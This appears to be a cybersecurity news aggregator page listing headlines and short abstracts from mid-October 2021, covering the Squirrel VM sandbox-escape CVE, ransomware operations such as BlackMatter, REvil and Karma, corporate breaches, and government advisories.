Researchers have disclosed an out-of-bounds read vulnerability in the Squirrel programming language that can be abused by attackers to break out of the sandbox restrictions and execute arbitrary code within a SquirrelVM, thus giving a malicious actor complete access to the underlying machine. Tracked as CVE-2021-41556 , the issue occurs when a game library referred to as Squirrel Engine is used to execute untrusted code and affects stable release branches 3.x and 2.x of Squirrel. The vulnerability was responsibly disclosed on August 10, 2021. Squirrel is an open-source, object-oriented programming language that's used for scripting video games and as well as in IoT devices and distributed transaction processing platforms such as Enduro/X. "In a real-world scenario, an attacker could embed a malicious Squirrel script into a community map and distribute it via the trusted Steam Workshop," researchers Simon Scannell and Niklas Breitfeld said in a report shared withThe Hacker News
October 19, 2021 – Ransomware
Experts found many similarities between the new Karma Ransomware and Nemty variants Full Text
Abstract
Sentinel Labs experts have analyzed the new Karma ransomware and speculate it represents an evolution of the Nemty ransomware operation. Karma ransomware is a new threat that was first spotted in June of 2021, it is important to distinguish it from...Security Affairs
October 19, 2021 – Vulnerabilities
Squirrel Bug Lets Attackers Execute Code in Games, Cloud Services Full Text
Abstract
The out-of-bounds read vulnerability enables an attacker to escape a Squirrel VM in games with millions of monthly players – such as Counter-Strike: Global Offensive and Portal 2 – and in cloud services such as Twilio Electric Imp.Threatpost
October 19, 2021 – Solution
Brave ditches Google for its own privacy-centric search engine Full Text
Abstract
Brave Browser has replaced Google with its own no-tracking privacy-centric Brave Search as the default search engine for new users in five regions.BleepingComputer
October 19, 2021 – Business
SASE Firm Cato Networks Raises $200 Million at $2.5 Billion Valuation Full Text
Abstract
The latest funding round was led by Lightspeed Venture Partners, with participation from Greylock, Aspect Ventures / Acrew Capital, Coatue, Singtel Innov8, and Shlomo Kramer.Security Week
October 19, 2021 – General
Keeping the world’s focus on cyber Full Text
Abstract
Christopher Painter, a former coordinator for cyber issues at the State Department under both the Obama and Trump administrations, says greater international engagement is required to face down malicious nations and cybercriminals alike.The Hill
October 19, 2021 – Malware
A New Variant of FlawedGrace Spreading Through Mass Email Campaigns Full Text
Abstract
Cybersecurity researchers on Tuesday took the wraps off a mass volume email attack staged by a prolific cybercriminal gang affecting a wide range of industries, with one of its region-specific operations notably targeting Germany and Austria. Enterprise security firm Proofpoint tied the malware campaign with high confidence to TA505 , which is the name assigned to the financially motivated threat group that's been active in the cybercrime business since at least 2014, and is behind the infamous Dridex banking trojan and other arsenals of malicious tools such as FlawedAmmyy, FlawedGrace, Neutrino botnet, and Locky ransomware, among others. The attacks are said to have started as a series of low-volume email waves, delivering only several thousand messages in each phase, before ramping up in late September and as recently as October 13, resulting in tens to hundreds of thousands of emails. "Many of the campaigns, especially the large volume ones, strongly resemble the hisThe Hacker News
October 19, 2021 – Hacker
Symantec uncovered a previously unknown nation-state actor, named Harvester, that targeted telcos Full Text
Abstract
Symantec spotted a previously unknown nation-state actor, tracked as Harvester, that is targeting telecommunication providers and IT firms in South Asia. Symantec spotted a previously unknown nation-state actor, tracked as Harvester, that is using...Security Affairs
October 19, 2021 – Education
A Guide to Doing Cyberintelligence on a Restricted Budget Full Text
Abstract
Cybersecurity budget cuts are everywhere. Chad Anderson, senior security researcher at DomainTools, discusses alternatives to fancy tooling, and good human skills alignment.Threatpost
October 19, 2021 – Attack
Acer hacked twice in a week by the same threat actor Full Text
Abstract
Acer has suffered a second cyberattack in just a week by the same hacking group that says other regions are vulnerable.BleepingComputer
October 19, 2021 – Criminals
Analysis: Top Ransomware Gangs Targeting Healthcare Sector Full Text
Abstract
Ransomware attacks are continuing to threaten the U.S. and global healthcare sectors, in part due to many entities' high dependency on legacy systems and lack of security resources, according to HC3.Gov Info Security
October 19, 2021 – Government
FBI, CISA, NSA published a joint advisory on BlackMatter ransomware operations Full Text
Abstract
FBI, CISA, NSA have published a joint advisory about the operation of the BlackMatter ransomware gang and provides defense recommendations. The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI),...Security Affairs
October 19, 2021 – General
About 26% of all malicious JavaScript threats are obfuscated Full Text
Abstract
A research that analyzed over 10,000 samples of diverse malicious software written in JavaScript concluded that roughly 26% of it is obfuscated to evade detection and analysis.BleepingComputer
October 19, 2021 – General
On Track for Fifth Record Year in a Row for Vulnerabilities Full Text
Abstract
With 15,080 vulnerabilities (2,957 high, 9,737 medium and 2,386 low) recorded as of October 14, 2021, we’re on track to marking a fifth record year of vulnerabilities discovered in production code.k2io
October 19, 2021 – Ransomware
Trustwave released a free decryptor for the BlackByte ransomware Full Text
Abstract
Trustwave’s SpiderLabs researchers have released a free decryptor for the BlackByte ransomware that can allow victims to recover their files. Researchers from Trustwave’s SpiderLabs have released a decryptor that can allow victims of the BlackByte...Security Affairs
October 19, 2021 – Ransomware
BlackByte ransomware decryptor released to recover files for free Full Text
Abstract
A free decryptor for the BlackByte ransomware has been released, allowing past victims to recover their files for free.BleepingComputer
October 19, 2021 – Criminals
LightBasin hacking group breaches 13 global telecoms in two years Full Text
Abstract
A group of hackers that security researchers call LightBasin has been compromising mobile telecommunication systems across the world for the past five years.BleepingComputer
October 19, 2021 – Policy and Law
Man gets 7 years in prison for hacking 65K health care employees Full Text
Abstract
Justin Sean Johnson, also known as TheDearthStar and Dearthy Star, was sentenced this week to seven years in prison for the 2014 hack of the health care provider and insurer University of Pittsburgh Medical Center (UPMC).BleepingComputer
October 19, 2021 – Government
FBI warns of fake govt sites used to steal financial, personal data Full Text
Abstract
The FBI warned the US public that threat actors actively use fake and spoofed unemployment benefit websites to harvest sensitive financial and personal information from unsuspecting victims.BleepingComputer
October 19, 2021 – Criminals
New Karma ransomware group likely a Nemty rebrand Full Text
Abstract
Threat analysts at Sentinel Labs have found evidence of the Karma ransomware being just another evolutionary step in the strain that started as JSWorm, became Nemty, then Nefilim, Fusion, Milihpen, and most recently, Gangbang.BleepingComputer
October 19, 2021 – Vulnerabilities
Microsoft issues advisory for Surface Pro 3 TPM bypass vulnerability Full Text
Abstract
Microsoft has published an advisory regarding a security feature bypass vulnerability impacting Surface Pro 3 tablets which could allow threat actors to introduce malicious devices within enterprise environments.BleepingComputer
October 18, 2021 – Hacker
Cybersecurity Experts Warn of a Rise in Lyceum Hacker Group Activities in Tunisia Full Text
Abstract
A threat actor, previously known for striking organizations in the energy and telecommunications sectors across the Middle East as early as April 2018, has evolved its malware arsenal to strike two entities in Tunisia. Security researchers at Kaspersky, who presented their findings at the VirusBulletin VB2021 conference earlier this month, attributed the attacks to a group tracked as Lyceum (aka Hexane), which was first publicly documented in 2019 by Secureworks. "The victims we observed were all high-profile Tunisian organizations, such as telecommunications or aviation companies," researchers Aseel Kayal, Mark Lechtik, and Paul Rascagneres detailed . "Based on the targeted industries, we assume that the attackers might have been interested in compromising such entities to track the movements and communications of individuals of interest to them." Analysis of the threat actor's toolset has shown that the attacks have shifted from leveraging a combinatThe Hacker News
October 18, 2021 – Education
Time to Build Accountability Back into Cybersecurity Full Text
Abstract
Chris Hass, director of information security and research at Automox, discusses how to assign security responsibility, punishment for poor cyber-hygiene and IDing ‘security champions’ to help small businesses.Threatpost
October 18, 2021 – Attack
Sinclair Confirms Ransomware Attack That Disrupted TV Stations Full Text
Abstract
A major cyberattack resulted in data being stolen, too, but Sinclair’s not sure which information is now in the hands of the crooks.Threatpost
October 18, 2021 – Government
FBI, CISA, NSA share defense tips for BlackMatter ransomware attacks Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) published today an advisory with details about how the BlackMatter ransomware gang operates.BleepingComputer
October 18, 2021 – Hacker
How Attackers Used Math Symbols to Evade Detection Full Text
Abstract
Experts reported a phishing attempt targeted at Verizon that involves the use of mathematical symbols to bypass anti-phishing systems to acquire users’ Office 365 credentials. The spoofed messages pretend to be a voicemail notification with an embedded Play button. The recent campaign reflects how ... Read MoreCyware Alerts - Hacker News
October 18, 2021 – Ransomware
Agencies say agriculture groups being targeted by BlackMatter ransomware Full Text
Abstract
A trio of federal agencies on Monday sounded the alarm about critical infrastructure groups, particularly agricultural organizations, being targeted by a prolific ransomware group.The Hill
October 18, 2021 – Education
Why Database Patching Best Practice Just Doesn’t Work and How to Fix It Full Text
Abstract
Patching really, really matters – patching is what keeps technology solutions from becoming like big blocks of Swiss cheese, with endless security vulnerabilities punching hole after hole into critical solutions. But anyone who's spent any amount of time maintaining systems will know that patching is often easier said than done. Yes, in some instances, you can just run a command line to install that patch, and that's it. These instances are increasingly rare though – given the complexity of the technology environment, you're more likely faced with a complex process to achieve patching best practice. In this article, we'll outline why database patching matters (yes, databases are vulnerable too!), explain what the problem is with patching databases, and point to a novel solution that takes the pain out of database patching. Watch out – your database services are vulnerable too We know that database services are critical – databases underpin IT operations in countleThe Hacker News
October 18, 2021 – Hacker
TeamTNT Deploys Malicious Docker Image On Docker Hub Full Text
Abstract
The Uptycs Threat Research Team spotted a campaign in which the TeamTNT threat actors deployed a malicious container image on Docker hub. The Uptycs Threat Research Team recently identified a campaign in which the TeamTNT threat actors deployed a malicious...Security Affairs
October 18, 2021 – General
Podcast: Could the Zoho Flaw Trigger SolarWinds 2.0? Full Text
Abstract
Companies are worried that the highly privileged password app could let attackers deep inside an enterprise’s footprint, says Redscan’s George Glass.Threatpost
October 18, 2021 – Breach
State-backed hackers breach telcos with custom malware Full Text
Abstract
A previously unknown state-sponsored actor is deploying a novel toolset in attacks targeting telecommunication providers and IT firms in South Asia.BleepingComputer
October 18, 2021 – Hacker
Chinese Actors Use MysterySnail RAT to Exploit Windows Zero-day Full Text
Abstract
Kaspersky unearthed a cyberespionage campaign exploiting a zero-day flaw in Windows to deliver MysterySnail malware and steal data. A connection to a Chinese-speaking APT was also established. Experts recommend organizations stay proactive and ready with adequate security measures.Cyware Alerts - Hacker News
October 18, 2021 – Attack
Sinclair Broadcast Group hit by ransomware attack Full Text
Abstract
Sinclair Broadcast Group, one of the nation’s largest television station operators, announced Monday that it had been hit by a ransomware attack over the weekend that resulted in data theft and network disruption.The Hill
October 18, 2021 – General
Over 30 Countries Pledge to Fight Ransomware Attacks in US-led Global Meeting Full Text
Abstract
Representatives from the U.S., the European Union, and 30 other countries pledged to mitigate the risk of ransomware and harden the financial system from exploitation with the goal of disrupting the ecosystem, calling it an "escalating global security threat with serious economic and security consequences." "From malign operations against local health providers that endanger patient care, to those directed at businesses that limit their ability to provide fuel, groceries, or other goods to the public, ransomware poses a significant risk to critical infrastructure, essential services, public safety, consumer protection and privacy, and economic prosperity," officials said in a statement released last week. To that end, efforts are expected to be made to enhance network resilience by adopting cyber hygiene good practices, such as using strong passwords, securing accounts with multi-factor authentication, maintaining periodic offline data backups, keeping softwaThe Hacker News
October 18, 2021 – Vulnerabilities
Prometheus endpoint unprotected installs could expose sensitive data Full Text
Abstract
Experts discovered several unprotected installs of open source event monitoring solution Prometheus that may expose sensitive data. JFrog researchers have discovered multiple unprotected instances of open source event monitoring solution Prometheus...Security Affairs
October 18, 2021 – Attack
Suspected Chinese hackers behind attacks on ten Israeli hospitals Full Text
Abstract
A joint announcement from the Ministry of Health and the National Cyber Directorate in Israel describes a spike in ransomware attacks over the weekend that targeted the systems of nine health institutes in the country.BleepingComputer
October 18, 2021 – Hacker
U.S. and Israeli Defense Tech Firms Targeted by Iranian Actors Full Text
Abstract
Iran-linked hackers were found conducting extensive password spraying attacks against Office 365 accounts of defense technology and global maritime firms in the U.S. and Israel. The group attempts to gain access to commercial satellite imagery and proprietary shipping plans/logs. Microsoft notifie ... Read MoreCyware Alerts - Hacker News
October 18, 2021 – Outage
Sinclair TV stations downtime allegedly caused by a ransomware attack Full Text
Abstract
A ransomware attack is likely the cause of the recent downtime for TV stations owned by the Sinclair Broadcast Group broadcast television company. TV stations owned by the Sinclair Broadcast Group went down over the weekend officially due to technical...Security Affairs
October 18, 2021 – Vulnerabilities
Microsoft asks admins to patch PowerShell to fix WDAC bypass Full Text
Abstract
Microsoft has asked system administrators to patch PowerShell 7 against two vulnerabilities allowing attackers to bypass Windows Defender Application Control (WDAC) enforcements and gain access to plain text credentials.BleepingComputer
October 18, 2021 – Outage
Update: Ecuador’s Banco Pichincha has yet to recover after recent cyberattack Full Text
Abstract
The bank issued a statement on Monday to inform customers about the cyberattack, it also added to have “identified a cybersecurity incident in our systems that has partially disabled our services.”Security Affairs
October 18, 2021 – Criminals
REvil ransomware operation shuts down once again Full Text
Abstract
It seems that the REvil ransomware operation has shut down once again after a threat actor has hijacked their Tor hidden service. The REvil ransomware gang has shut down its operation once again after a threat actor has hijacked their Tor leak site...Security Affairs
October 18, 2021 – Vulnerabilities
Credit card PINs can be guessed even when covering the ATM pad Full Text
Abstract
Researchers have proven it's possible to train a special-purpose deep-learning algorithm that can guess 4-digit card PINs 41% of the time, even if the victim is covering the pad with their hands.BleepingComputer
October 18, 2021 – Malware
Bugs in malware create ‘backdoors’ for security researchers Full Text
Abstract
New research from cloud security firm Zscaler, presented at the recent VB2021 conference, exploits bugs and coding errors in malware code to thwart infections by botnets, ransomware, and trojans.The Daily Swig
October 18, 2021 – Malware
Experts spotted an Ad-Blocking Chrome extension injecting malicious ads Full Text
Abstract
Researchers warn of an Ad-Blocking Chrome extension that was abused by threat actors to Injecting Ads in Google search pages. Researchers from Imperva have spotted a new deceptive ad injection campaign that is targeting users of some large websites...Security Affairs
October 18, 2021 – Outage
Sinclair TV stations crippled by weekend ransomware attack Full Text
Abstract
TV stations owned by the Sinclair Broadcast Group broadcast television company went down over the weekend across the US, with multiple sources telling BleepingComputer the downtime was caused by a ransomware attack.BleepingComputer
October 18, 2021 – Solution
Password Auditing Tool L0phtCrack Released as Open Source Full Text
Abstract
First released in 1997, the L0phtCrack tool can be used to test password strength and recover lost Windows passwords via dictionary, brute-force, and other types of attacks.Security Week
October 18, 2021 – Breach
Update: Accenture Confirms Data Stolen in Ransomware Attack Full Text
Abstract
In a Form 10-K filing with the Securities and Exchange Commission (SEC) last week, the company confirmed that the attackers were able to steal some proprietary information from its servers.Security Week
October 18, 2021 – General
Critical infrastructure security dubbed ‘abysmal’ by researchers Full Text
Abstract
It was only last month that the Port of Houston fended off a cyberattack and there is no reason to believe cyberattacks on OT systems won't continue -- or, perhaps, become more common.ZDNet
October 17, 2021 – Criminals
REvil Ransomware Gang Goes Underground After Tor Sites Were Compromised Full Text
Abstract
REvil, the notorious ransomware gang behind a string of cyberattacks in recent years, appears to have gone off the radar once again, a little over a month after the cybercrime group staged a surprise return following a two-month-long hiatus. The development, first spotted by Recorded Future's Dmitry Smilyanets , comes after a member affiliated with the REvil operation posted on the XSS hacking forum that unidentified actors had taken control of the gang's Tor payment portal and data leak website. "The server was compromised and they were looking for me. To be precise, they deleted the path to my hidden service in the torrc file and raised their own so that I would (sic) go there. I checked on others - this was not. Good luck everyone, I'm off," user 0_neday said in the post. As of writing, it isn't clear exactly who was behind the compromise of REvil's servers, although it wouldn't be entirely surprising if law enforcement agencies played a rThe Hacker News
October 17, 2021 – Education
Is Your Data Safe? Check Out Some Cybersecurity Master Classes Full Text
Abstract
Since cybersecurity is definitely an issue that's here to stay, I've just checked out the recently released first episodes of Cato Networks Cybersecurity Master Class Series . According to Cato, the series aims to teach and demonstrate cybersecurity tools and best practices; provide research and real-world case studies on cybersecurity; and bring the voices and opinions of top cybersecurity thought-leaders. Designed for security and IT professionals, C-level managers and security experts, each session contains both theory and hands-on examples about strategic, tactical, and operational issues on a wide range of topics. The classes are hosted by industry-recognized cybersecurity researcher and keynote speaker, Etay Maor, who is also Senior Director of Security Strategy at Cato. Four out of the planned annual 8-10 episodes are currently available online. Episode 1 , entitled How (and Why) to Apply OSINT to Protect your Enterprise takes an in-depth look at our era of data proliThe Hacker News
October 17, 2021 – Vulnerabilities
Windows 10, Linux, iOS, Chrome and Many Others at Hacked Tianfu Cup 2021 Full Text
Abstract
Windows 10, iOS 15, Google Chrome, Apple Safari, Microsoft Exchange Server, and Ubuntu 20 were successfully broken into using original, never-before-seen exploits at the Tianfu Cup 2021, the fourth edition of the international cybersecurity contest held in the city of Chengdu, China. Targets this year included Google Chrome running on Windows 10 21H1, Apple Safari running on Macbook Pro, Adobe PDF Reader, Docker CE, Ubuntu 20/CentOS 8, Microsoft Exchange Server 2019, Windows 10, VMware Workstation, VMware ESXi, Parallels Desktop, iPhone 13 Pro running iOS 15, domestic mobile phones running Android, QEMU VM, Synology DS220j DiskStation, and ASUS RT-AX56U router. The Chinese version of Pwn2Own was started in 2018 in the wake of government regulation in the country that barred security researchers from participating in international hacking competitions because of national security concerns. With the exception of Synology DS220j NAS, Xiaomi Mi 11 smartphone, and an unnamed ChineThe Hacker News
October 17, 2021 – Outage
REvil ransomware shuts down again after Tor sites were hijacked Full Text
Abstract
The REvil ransomware operation has likely shut down once again after an unknown person hijacked their Tor payment portal and data leak blog.BleepingComputer
October 17, 2021 – Government
Avoid Using Wildcard TLS Certificates, Warns NSA Full Text
Abstract
The NSA clued in organizations against the use of wildcard TLS certificates that may lead to a widespread attack on an organization, as well as invite the new ALPACA TLS attack. According to researchers, around 119,000 web servers are still exposed to the new ALPACA attacks.Cyware Alerts - Hacker News
October 17, 2021 – Hacker
Experts hacked a fully patched iOS 15 running on iPhone 13 at China’s Tianfu Cup hacking contest Full Text
Abstract
White hat hackers earned $1.88 million at the Tianfu Cup hacking contest by finding vulnerabilities in popular software. The Tianfu Cup is the most important hacking contest held in China, this year white hat hackers earned $1.88 Million demonstrating...Security Affairs
October 17, 2021 – Malware
Fake Android Apps Steal Credentials from Japanese Telecom Users Full Text
Abstract
An Android-based phishing campaign was observed targeting customers of telecommunication services based in Japan. The malware-laced fake app steals credentials and session cookies. Experts recommend bypass such risks by avoiding apps downloads from unknown third-party stores.Cyware Alerts - Hacker News
October 17, 2021 – Breach
Twitch security breach had minimal impact, the company states Full Text
Abstract
Twitch provided an update for the recent security breach, the company confirmed that it only had a limited impact on a small number of users. Twitch downplayed the recent security breach in an update, the company said it only impacted a small number...Security Affairs
October 17, 2021 – Botnet
TrickBot’s FIN12 is Claiming Victims at Higher Rate Full Text
Abstract
New Mandiant report claims FIN12 has been dropping Ryuk ransomware rapidly across multiple sectors, with one in five victims in the healthcare sector. It targets organizations that have annual revenues over $300 million, with an average of almost $6 billion. The report found that the average time F ... Read MoreCyware Alerts - Hacker News
October 17, 2021 – Outage
Ecuador’s Banco Pichincha has yet to recover after recent cyberattack Full Text
Abstract
The customers of Banco Pichincha, the largest bank in Ecuador, are still experiencing service disruptions after a massive cyberattack hit the financial organization early this week. The cyberattack took place over the last weekend and forced the bank...Security Affairs
October 16, 2021 – Cryptocurrency
$5.2 billion in BTC transactions tied to top 10 ransomware variants: US Treasury Full Text
Abstract
FinCen said the total value of suspicious activity reported in ransomware-related SARs during the first six months of 2021 was $590 million, which exceeds the $416 million reported for all of 2020.ZDNet
October 16, 2021 – Botnet
Trickbot spreads malware through new distribution channels Full Text
Abstract
TrickBot operators are back and expand the distribution channels with partnership with cybercrime affiliates. The operators behind the infamous TrickBot (ITG23 and Wizard Spider) malware have resurfaced with new distribution channels to deliver malicious...Security Affairs
October 16, 2021 – General
Critical infrastructure security dubbed ‘abysmal’ by researchers Full Text
Abstract
CloudSEK published a new report exploring ICSs and their security posture in light of recent cyberattacks against the industrial, utility, and manufacturing targets. The research focuses on ICSs available through the internet.ZDNet
October 16, 2021 – APT
Russia-Linked TA505 targets financial institutions in a new malspam campaign Full Text
Abstract
Russia-linked TA505 group leverages a lightweight Office file to spread malware in a campaign, tracked as MirrorBlast, aimed at financial institutions. Russia-linked APT group TA505 (e.g. Evil Corp) is leveraging a lightweight Office file in a new malware...Security Affairs
October 16, 2021 – Hacker
Researchers Disclose New Side-Channel Attacks Affecting All AMD CPUs Full Text
Abstract
Researchers have disclosed the details of new timing and power-based side-channel attacks that affect all CPUs made by AMD, but the chipmaker says no new mitigations are necessary.Security Week
October 16, 2021 – General
US Treasury FinCEN linked $5.2 billion in BTC transactions to ransomware payments Full Text
Abstract
The U.S. Treasury Department's Financial Crimes Enforcement Network (FinCEN) linked roughly $5.2 billion worth of Bitcoin transactions to ransomware. The U.S. Treasury Department's Financial Crimes Enforcement Network (FinCEN) has identified approximately...Security Affairs
October 16, 2021 – Breach
Amazon-owned Twitch says source code exposed in last week’s data breach Full Text
Abstract
Amazon.com Inc-owned Twitch has said that last week’s data breach at the live streaming e-sports platform contained documents from its source code. Twitch said it was “confident” the incident affected only a small number of users.Reuters
October 16, 2021 – Vulnerabilities
Juniper Networks Patches Over 70 Vulnerabilities Full Text
Abstract
Networking and cybersecurity solutions provider Juniper Networks this week released more than 40 security advisories to describe over 70 vulnerabilities that affect the company’s products.Security Week
October 15, 2021 – General
The Week in Ransomware - October 15th 2021 - Disrupting ransoms Full Text
Abstract
This week, senior officials from over thirty countries held virtual conferences on disrupting ransomware operations and attacks.BleepingComputer
October 15, 2021 – Cryptocurrency
NFT Marketplace OpenSea Patches Flaw Potentially Leading to Cryptocurrency Theft Full Text
Abstract
OpenSea, the world’s largest NFT marketplace, has addressed a security vulnerability that could have allowed hackers to hijack user accounts and empty their crypto wallets with the help of maliciously crafted NFTs (non-fungible tokens).Security Week
October 15, 2021 – General
Treasury: $590M paid out by victims of ransomware attacks in first half of 2021 Full Text
Abstract
A report released by the Treasury Department Friday found that around $590 million had been paid by victims of ransomware to their attackers in the first six months of 2021, as such attacks skyrocketed.The Hill
October 15, 2021 – Botnet
Attackers Behind Trickbot Expanding Malware Distribution Channels Full Text
Abstract
The operators behind the pernicious TrickBot malware have resurfaced with new tricks that aim to increase its foothold by expanding its distribution channels, ultimately leading to the deployment of ransomware such as Conti. The threat actor, tracked under the monikers ITG23 and Wizard Spider, has been found to partner with other cybercrime gangs known Hive0105, Hive0106 (aka TA551 or Shathak), and Hive0107, adding to a growing number of campaigns that the attackers are banking on to deliver proprietary malware, according to a report by IBM X-Force. "These and other cybercrime vendors are infecting corporate networks with malware by hijacking email threads, using fake customer response forms and social engineering employees with a fake call center known as BazarCall," researchers Ole Villadsen and Charlotte Hammond said . Since emerging on the threat landscape in 2016, TrickBot has evolved from a banking trojan to a modular Windows-based crimeware solution, while alsoThe Hacker News
October 15, 2021 – Privacy
Bugs in Our Pockets: The Risks of Client-Side Scanning Full Text
Abstract
Client-side scanning poses serious technical risks, and there is little that prevents such systems from being repurposed to scan for other types of targeted content.Lawfare
October 15, 2021 – Breach
Accenture discloses data breach after LockBit ransomware attack Full Text
Abstract
IT and consulting giant Accenture confirmed a data breach after the ransomware attack conducted by LockBit operators in August 2021. Global IT consultancy giant Accenture discloses a data breach after the LockBit ransomware attack that hit the company...Security Affairs
October 15, 2021 – Cryptocurrency
US links $5.2 billion worth of Bitcoin transactions to ransomware Full Text
Abstract
The U.S. Treasury Department's Financial Crimes Enforcement Network (FinCEN) has identified roughly $5.2 billion worth of outgoing Bitcoin transactions likely tied to the top 10 most commonly reported ransomware variants.BleepingComputer
October 15, 2021 – Botnet
This malware botnet gang has stolen millions with a surprisingly simple trick Full Text
Abstract
The long-running botnet known as MyKings is still in business and has raked in at least $24.7 million by using its network of compromised computers to mine for cryptocurrencies.ZDNet
October 15, 2021 – Malware
Ad-Blocking Chrome Extension Caught Injecting Ads in Google Search Pages Full Text
Abstract
A new deceptive ad injection campaign has been found leveraging an ad blocker extension for Google Chrome and Opera web browsers to sneakily insert ads and affiliate codes on websites, according to new research from cybersecurity firm Imperva. The findings come following the discovery of rogue domains distributing an ad injection script in late August 2021 that the researchers connected to an add-on called AllBlock. The extension has since been pulled from both the Chrome Web Store and Opera add-ons marketplaces. While AllBlock is designed to block ads legitimately, the JavaScript code is injected into every new tab opened on the browser. It works by identifying and sending all links in a web page — typically on search engine results pages — to a remote server, which responds back with a list of websites to replace the genuine links with, leading to a scenario where upon clicking a link, the victim is redirected to a different page. "When the user clicks on any modified liThe Hacker News
October 15, 2021 – Vulnerabilities
Juniper Networks released +40 security advisories to fix +70 vulnerabilities Full Text
Abstract
Cybersecurity provider Juniper Networks released more than 40 security advisories to address over 70 vulnerabilities that affect its solutions. Cybersecurity provider Juniper Networks released more than 40 security advisories to address more than...Security Affairs
October 15, 2021 – Attack
Twitch downplays this month’s hack, says it had minimal impact Full Text
Abstract
In an update regarding this month's security incident, Twitch downplayed the breach saying that it had minimal impact and it only affected a small number of users.BleepingComputer
October 15, 2021 – Ransomware
BlackByte: Free Decryptor Released for Ransomware Strain Full Text
Abstract
Trustwave, a Chicago-based cybersecurity and managed security services provider owned by Singaporean telecommunications company Singtel Group Enterprise, on Friday announced the release of the free decryptor, available for download from GitHub.Gov Info Security
October 15, 2021 – Government
CISA Issues Warning On Cyber Threats Targeting Water and Wastewater Systems Full Text
Abstract
The U.S. Cybersecurity Infrastructure and Security Agency (CISA) on Thursday warned of continued ransomware attacks aimed at disrupting water and wastewater facilities (WWS), highlighting five incidents that occurred between March 2019 and August 2021. "This activity—which includes attempts to compromise system integrity via unauthorized access—threatens the ability of WWS facilities to provide clean, potable water to, and effectively manage the wastewater of, their communities," CISA, along with the Federal Bureau of Investigation (FBI), the Environmental Protection Agency (EPA), and the National Security Agency (NSA), said in a joint bulletin. Citing spear-phishing, outdated operating systems and software, and control system devices running vulnerable firmware versions as the primary intrusion vectors, the agencies singled out five different cyber attacks from 2019 to early 2021 targeting the WWS Sector — A former employee at Kansas-based WWS facility unsuccessfullyThe Hacker News
October 15, 2021 – Attack
Boffins devise a new side-channel attack affecting all AMD CPUs Full Text
Abstract
A group of researchers from the Graz University of Technology and CISPA Helmholtz Center for Information Security devised a new side-channel attack that affects AMD CPUs. Researchers Moritz Lipp and Daniel Gruss of the Graz University of Technology...Security Affairs
October 15, 2021 – Breach
Accenture confirms data breach after August ransomware attack Full Text
Abstract
Global IT consultancy giant Accenture confirmed that LockBit ransomware operators stole data from its systems during an attack that hit the company's systems in August 2021.BleepingComputer
October 15, 2021 – Attack
Verizon-owned Visible Acknowledges Hack, Confirms Account Manipulations Full Text
Abstract
The company came forward and confirmed the attack in a Twitter thread, writing that it was "aware of an issue in which some member accounts were accessed and/or charged without their authorization."ZDNet
October 15, 2021 – Attack
Three more ransomware attacks hit Water and Wastewater systems in 2021 Full Text
Abstract
A joint cybersecurity advisory published by US agencies revealed that three ransomware attacks on wastewater systems this year. A joint cybersecurity advisory published today by the FBI, NSA, CISA, and the EPA revealed three more attacks launched...Security Affairs
October 15, 2021 – Criminals
Russian cybercrime gang targets finance firms with stealthy macros Full Text
Abstract
A new phishing campaign dubbed MirrorBlast is deploying weaponized Excel documents that are extremely difficult to detect to compromise financial service organizationsBleepingComputer
October 15, 2021 – Government
CISA Outlines Cyberthreats Targeting US Water and Wastewater Systems Full Text
Abstract
Cybersecurity company Dragos worked with CISA, the FBI, the NSA and the EPA to outline cyberthreats targeting the information and operational technology underpinning the networks, systems and devices of US water and wastewater facilities.ZDNet
October 15, 2021 – Government
Governments worldwide to crack down on ransomware payment channels Full Text
Abstract
Senior officials from 31 countries and the European Union said that their governments would take action to disrupt the cryptocurrency payment channels used by ransomware gangs to finance their operations.BleepingComputer
October 15, 2021 – Privacy
Cybersecurity Experts Sound Alarm on Apple and E.U. Phone Scanning Plans Full Text
Abstract
More than a dozen prominent cybersecurity experts raised concerns on plans by Apple and the EU to monitor people’s phones for illicit material, calling the efforts ineffective and dangerous strategies that would embolden government surveillance.New York Times
October 15, 2021 – Government
US government discloses more ransomware attacks on water plants Full Text
Abstract
U.S. Water and Wastewater Systems (WWS) Sector facilities have been breached multiple times in ransomware attacks during the last two years according to joint advisory published by US government agencies on Thursday.BleepingComputer
October 15, 2021 – Malware
Adblocker promises to blocks ads, injects them instead Full Text
Abstract
Researchers at Imperva uncovered a new ad injection campaign based on an adblocker named AllBlock. The AllBlock extension was available at the time of writing for Chrome and Opera in the respective web stores.Malwarebytes Labs
October 14, 2021 – Solution
WhatsApp rolls out iOS, Android end-to-end encrypted chat backups Full Text
Abstract
WhatsApp is rolling out end-to-end encrypted chat backups on iOS and Android to prevent anyone from accessing your chats, regardless of where they are stored.BleepingComputer
October 14, 2021 – Attack
Israeli Hospital Forced to Cancel Non-Urgent Procedures Due to Ransomware Attack Full Text
Abstract
Israel’s National Cyber Directorate (INCD) is urging organizations across the country to bolster their cyber defenses following a disruptive ransomware attack against a hospital in Israel’s northwest.The Daily Swig
October 14, 2021 – Government
Agencies warn of cyber threats to water, wastewater systems Full Text
Abstract
A coalition of federal agencies on Thursday warned that hackers are targeting the water and wastewater treatment sectors, strongly recommending that organizations take steps to protect themselves.The Hill
October 14, 2021 – Hacker
Google: We’re Tracking 270 State-Sponsored Hacker Groups From Over 50 Countries Full Text
Abstract
Google's Threat Analysis Group (TAG) on Thursday said it's tracking more than 270 government-backed threat actors from more than 50 countries, adding it has approximately sent 50,000 alerts of state-sponsored phishing or malware attempts to customers since the start of 2021. The warnings mark a 33% increase from 2020, the internet giant said, with the spike largely stemming from "blocking an unusually large campaign from a Russian actor known as APT28 or Fancy Bear." Additionally, Google said it disrupted a number of campaigns mounted by an Iranian state-sponsored attacker group tracked as APT35 (aka Charming Kitten, Phosphorous, or Newscaster), including a sophisticated social engineering attack dubbed "Operation SpoofedScholars" aimed at think tanks, journalists, and professors with an aim to solicit sensitive information by masquerading as scholars with the University of London's School of Oriental and African Studies (SOAS). Details of thThe Hacker News
October 14, 2021 – Encryption
WhatsApp made available end-to-end encrypted chat backups Full Text
Abstract
WhatsApp made available end-to-end encrypted chat backups on iOS and Android to prevent anyone from accessing user chats. WhatsApp is rolling out end-to-end encrypted chat backups on both iOS and Android devices, the move aims at implementing an optional...Security Affairs
October 14, 2021 – Vulnerabilities
Rickroll Grad Prank Exposes Exterity IPTV Bug Full Text
Abstract
IPTV and IP video security is increasingly under scrutiny, even by high school kids.Threatpost
October 14, 2021 – Solution
